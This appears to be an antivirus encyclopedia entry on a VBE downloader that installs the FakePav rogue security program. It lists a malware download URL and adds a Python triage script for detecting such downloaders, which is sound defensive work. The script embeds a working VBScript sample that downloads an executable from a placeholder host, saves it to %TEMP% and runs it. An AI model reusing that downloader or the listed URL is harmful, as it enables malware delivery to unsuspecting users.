This threat is a file that is used to download rogue security software programs that we detect as Win32/FakePav.
It is a .vbe file, that is, a Visual Basic Script (VBS) file that has been obfuscated with the Windows Script Encoder.
When run, the file tries to connect to a server whose address is hardcoded in the script; because the address is built into each file, it differs between variants. It then tries to download a file from that server and saves it to the %TEMP% folder with a .exe extension.
We have seen a copy of this threat named setup.exe.vbe download from the following server and path:
- <hexadecimal value>-a941e09a8ebc3a85367c1ba4d545bd67.r11.cf2.rackcdn.com/7b46a66b3ce37eb916e5e89b76968f48.exe
The downloaded file installs the Win32/FakePav rogue onto your PC.
It uses the COM objects MSXML2.XMLHTTP, which makes the HTTP request, and ADODB.Stream, which writes the response body to disk, to download and save the .exe file.
Some variants use signed VBS files.
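The MSXML2.XMLHTTP plus ADODB.Stream chain described above is the classic "fetch, write to %TEMP%, run" pattern of a VBS downloader, and it is what an analyst looks for when triaging a decoded script. The following is an added triage helper, not code from the original entry and not the threat itself: it recognises Script Encoder output by its `#@~^` / `^#~@` markers, and on plain-text VBS it pulls out the ProgIDs created, any URLs, the SaveToFile target and whether the script executes what it wrote. The sample script, its URL and file names are constructed for illustration.

```python
"""Triage helper for VBScript/VBE downloaders (added example, not the page's own code)."""
import re

# Windows Script Encoder (screnc / VBScript.Encode) output starts and ends with
# these markers. It is obfuscation, not encryption, so a .vbe delivered to end
# users is itself a signal worth flagging.
VBE_HEADER = b"#@~^"
VBE_TRAILER = b"^#~@"

# COM ProgIDs that, used together, form the fetch / write / execute chain.
FETCH_PROGIDS = {"msxml2.xmlhttp", "msxml2.serverxmlhttp",
                 "microsoft.xmlhttp", "winhttp.winhttprequest.5.1"}
WRITE_PROGIDS = {"adodb.stream", "scripting.filesystemobject"}
EXEC_PROGIDS = {"wscript.shell", "shell.application"}

_CREATE = re.compile(r'CreateObject\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
_URL = re.compile(r'"(https?://[^"\s]+)"', re.IGNORECASE)
_SAVE = re.compile(r'\.SaveToFile\s+([^,\r\n]+)', re.IGNORECASE)
_RUN = re.compile(r'\.(Run|Exec|ShellExecute)\b', re.IGNORECASE)

# Constructed sample in the shape of the downloader described above (not the
# real malware; example.invalid is a reserved, non-resolving domain).
SAMPLE_VBS = r'''
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "http://example.invalid/payload.exe", False
http.Send
Set sh = CreateObject("WScript.Shell")
tmp = sh.ExpandEnvironmentStrings("%TEMP%") & "\update.exe"
Set s = CreateObject("ADODB.Stream")
s.Type = 1
s.Open
s.Write http.responseBody
s.SaveToFile tmp, 2
sh.Run tmp
'''


def is_vbe(data: bytes) -> bool:
    """True if the bytes look like Script Encoder output (a .vbe body)."""
    body = data.lstrip(b"\xef\xbb\xbf \t\r\n")  # tolerate a UTF-8 BOM / whitespace
    return body.startswith(VBE_HEADER) and VBE_TRAILER in body


def triage(script: str) -> dict:
    """Extract downloader indicators from decoded VBScript source."""
    progids = {m.group(1).lower() for m in _CREATE.finditer(script)}
    fetch = bool(progids & FETCH_PROGIDS)
    write = bool(progids & WRITE_PROGIDS)
    executes = bool(progids & EXEC_PROGIDS) and _RUN.search(script) is not None
    if fetch and write:
        verdict = "downloader"
    elif fetch or write:
        verdict = "suspicious"
    else:
        verdict = "no-downloader-indicators"
    return {
        "progids": sorted(progids),
        "urls": _URL.findall(script),
        "save_targets": [s.strip() for s in _SAVE.findall(script)],
        "uses_temp": re.search(r"%TEMP%", script, re.IGNORECASE) is not None,
        "executes": executes,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_VBS))
```

Run it against a decoded script (decode the .vbe first; the encoder is reversible) and the URL and save target become the indicators to block and hunt for. The ProgID sets are a starting point: WinHTTP and FileSystemObject variants of the same chain are included so the check is not defeated by a trivial swap of the download object.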
Analysis by Wei Li